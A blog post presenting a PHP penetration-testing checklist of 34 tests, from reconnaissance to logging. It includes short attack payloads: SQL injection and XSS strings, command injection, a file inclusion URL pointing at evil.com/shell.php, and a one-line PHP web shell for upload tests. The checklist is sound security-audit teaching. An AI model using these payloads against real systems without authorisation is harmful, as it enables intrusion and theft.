Monday, March 30, 2026 • Sachin Prajapati

PHP Security Audit Checklist: 30+ Tests Used by Penetration Testers

Below is a realistic penetration tester’s checklist (30+ tests) used when auditing websites built with PHP.
These checks are typically performed during web application penetration tests and security audits. They are based on methodologies such as those promoted by the OWASP.

The checklist is grouped into phases used by professional pentesters.

1. Reconnaissance & Information Gathering

Goal: Identify technologies, entry points, and exposed information.

1. Identify server technology

Check headers for:

Server: Apache
X-Powered-By: PHP/8.x

Web servers often used:

  • Apache HTTP Server

  • Nginx

2. Determine PHP version

Use tools or header inspection.

Example:

X-Powered-By: PHP/8.1

Older versions may have known vulnerabilities.

3. Check for exposed phpinfo()

Attackers try:

/phpinfo.php

If accessible, it reveals:

  • server paths

  • modules

  • environment variables

  • configuration settings

4. Directory discovery

Test hidden directories:

/admin
/backup
/config
/uploads

Tools often used:

  • DirBuster

  • Gobuster

5. Backup file discovery

Look for:

config.php.bak
database.sql
site.zip

Backup files often expose credentials.

2. Authentication Testing

6. Brute-force login testing

Test weak credentials.

Example:

admin:admin
admin:password

Tools commonly used:

  • Hydra

  • Burp Suite

7. Check password policy

Test if passwords require:

  • minimum length

  • complexity

  • expiration

8. Account lockout testing

Verify if login attempts are limited.

Weak systems allow unlimited attempts.

9. Session fixation testing

Check if session ID changes after login.

If not, attackers may hijack sessions.

10. Session timeout testing

Sessions should expire after inactivity.

Example:

30 minutes inactivity timeout

3. Session Management Testing

11. Cookie security flags

Check cookies for:

HttpOnly
Secure
SameSite

These protect sessions.

12. Session ID randomness

Session IDs should be unpredictable.

Weak example:

SESSIONID=12345

Strong example:

SESSIONID=1a7f93e2c6d8

13. Session hijacking test

Attempt to reuse session tokens from another browser.

4. Input Validation Testing

14. SQL Injection testing

Test input fields like:

' OR '1'='1

If successful, the database query becomes true.

Example vulnerable query:

$query = "SELECT * FROM users WHERE username='$user'";

15. Cross-Site Scripting (XSS)

Inject JavaScript:

<script>alert(1)</script>

If it executes, the site is vulnerable.

16. Command injection testing

Try input like:

; ls

If the server executes it, command injection exists.

17. File inclusion testing

Test parameters like:

?page=../../../../etc/passwd

This checks Local File Inclusion (LFI).

18. Remote file inclusion testing

Example:

?page=http://evil.com/shell.php

Works only if misconfigured.

19. Parameter tampering

Modify request parameters.

Example:

price=100 → price=1

Check if server validates values.

5. File Upload Testing

20. Upload PHP shell

Try uploading:

shell.php

Example test payload:

<?php system($_GET['cmd']); ?>

21. Upload double extensions

Example:

shell.php.jpg

Some servers execute it as PHP.

22. MIME type bypass

Change request header:

Content-Type: image/jpeg

Even if uploading .php.

23. Upload large files

Test server limits.

Example:

1GB upload attempt

May cause Denial-of-Service.

6. Access Control Testing

24. Privilege escalation

Attempt to access admin pages:

/admin
/admin/dashboard

Without authentication.

25. Insecure direct object reference (IDOR)

Example:

/user?id=1001

Change to:

/user?id=1002

If it loads another user's data → vulnerability.

26. Forced browsing

Access restricted pages directly.

Example:

/admin/deleteUser.php

7. Configuration Testing

27. php.ini security check

Verify:

  • display_errors

  • allow_url_include

  • disable_functions

in php.ini.

28. Directory listing test

Try accessing:

/uploads/

If files are listed, attackers may download them.

29. Check debug modes

Developers often leave debug enabled.

Frameworks like:

  • Laravel

  • Symfony

may reveal stack traces.

30. Sensitive file exposure

Check for:

.env
.git
composer.json

These may contain secrets.

8. SSL/TLS Security Testing

31. HTTPS enforcement

Check if HTTP redirects to HTTPS.

32. TLS configuration

Verify encryption using tools like:

  • SSL Labs

9. Logging & Monitoring

33. Log injection

Test if attackers can manipulate logs.

Example input:

admin\nhacked

34. Error handling testing

Trigger errors intentionally.

Example:

?id='

Check if sensitive information appears.

Example Pentesting Workflow

A professional pentester typically performs tests in this order:

1. Reconnaissance
2. Identify technologies
3. Discover endpoints
4. Test authentication
5. Test session management
6. Test input validation
7. Test file uploads
8. Test access control
9. Test configuration security
10. Evaluate encryption and logging

What Pentesters Use During PHP Audits

Common tools include:

  • Burp Suite

  • OWASP ZAP

  • Nikto

  • Gobuster

  • SQLmap

These automate vulnerability testing.

Final Concept

A secure PHP application requires protection in three layers:

1️⃣ Secure code
2️⃣ Hardened **PHP configuration
3️⃣ Secure server setup

Penetration testing helps identify weaknesses before attackers exploit them.